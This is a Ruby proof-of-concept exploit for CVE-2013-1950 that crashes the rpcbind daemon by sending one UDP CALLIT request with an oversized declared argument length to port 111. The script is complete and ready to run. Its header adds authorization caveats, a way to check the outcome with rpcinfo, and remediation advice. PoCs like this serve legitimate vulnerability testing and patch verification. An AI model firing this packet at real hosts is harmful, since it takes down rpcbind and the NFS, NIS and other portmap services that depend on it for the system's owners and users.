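#!/usr/bin/ruby
# frozen_string_literal: true
#
# rpcbind_udp_crash_poc.rb
# 07/15/2013
# Sean Verity <veritysr1980 [at] gmail.com>
# CVE 2013-1950
#
# rpcbind (CALLIT Procedure) UDP Crash PoC
# Affected Software Package: rpcbind-0.2.0-19
#
# Tested on:
# Fedora 17 (3.9.8-100.fc17.x86_64 #1 SMP)
# CentOS 6.3 Final (2.6.32-279.22.1.el6.x86_64 #1 SMP)
#
# rpcbind can be crashed by setting the argument length
# value > 8944 in an RPC CALLIT procedure request over UDP.
#
# Operational notes:
# - This is a denial-of-service PoC: one datagram takes the rpcbind
#   daemon down. Run it only against hosts you are authorized to test,
#   and expect NFS/NIS and any other portmap client on the target to
#   lose service until rpcbind is restarted.
# - UDP gives no acknowledgement, so a successful send() proves nothing
#   about the outcome; check the daemon separately (e.g. compare
#   `rpcinfo -p <target>` before and after).
# - Remediation is a patched rpcbind package (see your distribution's
#   advisory for CVE-2013-1950). Filtering UDP/111 at the perimeter limits
#   exposure, but RPC over UDP is unauthenticated and the source address
#   of a datagram is trivially spoofed, so do not rely on logs of the
#   sender to attribute an attack.
require 'socket'

# ONC RPC v2 message and portmap constants (message layout per RFC 1057).
RPC_MSG_CALL  = 0        # msg_type CALL
RPC_VERSION   = 2        # rpcvers
AUTH_NULL     = 0        # credential / verifier flavor with a zero-length body
PORTMAP_PROG  = 100_000  # program number of portmap / rpcbind
PORTMAP_VERS  = 2        # portmap v2 (PMAPPROC_CALLIT lives here)
PROC_CALLIT   = 5        # CALLIT procedure
PORTMAP_PORT  = 111      # well-known rpcbind port

# Smallest "argument length" reported (see header) to crash the affected
# rpcbind: anything > 8944 is enough.
CRASH_ARG_LEN = 8945

# Print usage to stderr and exit with a non-zero status.
def usage
  abort "\nusage: ./rpcbind_udp_crash_poc.rb <target>\n\n"
end

# Build the raw RPC CALL datagram for portmap CALLIT.
#
# arg_len:: value written into the CALLIT "argument length" field; the
#           oversized declared length, not the payload, is the trigger.
# args::    bytes actually appended after the length field. Deliberately
#           not padded to the XDR 4-byte boundary, as in the original PoC.
# xid::     transaction id; random by default, overridable to make
#           captures reproducible.
#
# Returns a binary String ready to send.
def build_callit_packet(arg_len = CRASH_ARG_LEN, args = 'crash', xid = rand(2**32))
  # Call header: xid, CALL, rpc version, program, version, procedure,
  # then AUTH_NULL credentials and AUTH_NULL verifier (flavor + length 0 each).
  header = [xid, RPC_MSG_CALL, RPC_VERSION,
            PORTMAP_PROG, PORTMAP_VERS, PROC_CALLIT,
            AUTH_NULL, 0, AUTH_NULL, 0].pack('N*')
  # CALLIT body: forward to program 0, version 1, procedure 1, then the
  # claimed argument length followed by the (much shorter) argument bytes.
  callit = [0, 1, 1, arg_len].pack('N*')
  header + callit + args
end

# Send +pkt+ to target:port over UDP and always close the socket.
# Returns the number of bytes written. Raises SocketError if the target
# name does not resolve, or a SystemCallError if the send itself fails.
def send_packet(target, pkt, port = PORTMAP_PORT)
  sock = UDPSocket.new
  begin
    sock.send(pkt, 0, target, port)
  ensure
    sock.close
  end
end

if ARGV.length == 1
  begin
    send_packet(ARGV[0], build_callit_packet)
  rescue SocketError, SystemCallError => e
    # Bad hostname or an unreachable network: report cleanly instead of a backtrace.
    abort "error sending to #{ARGV[0]}: #{e.message}"
  end
else
  usage
end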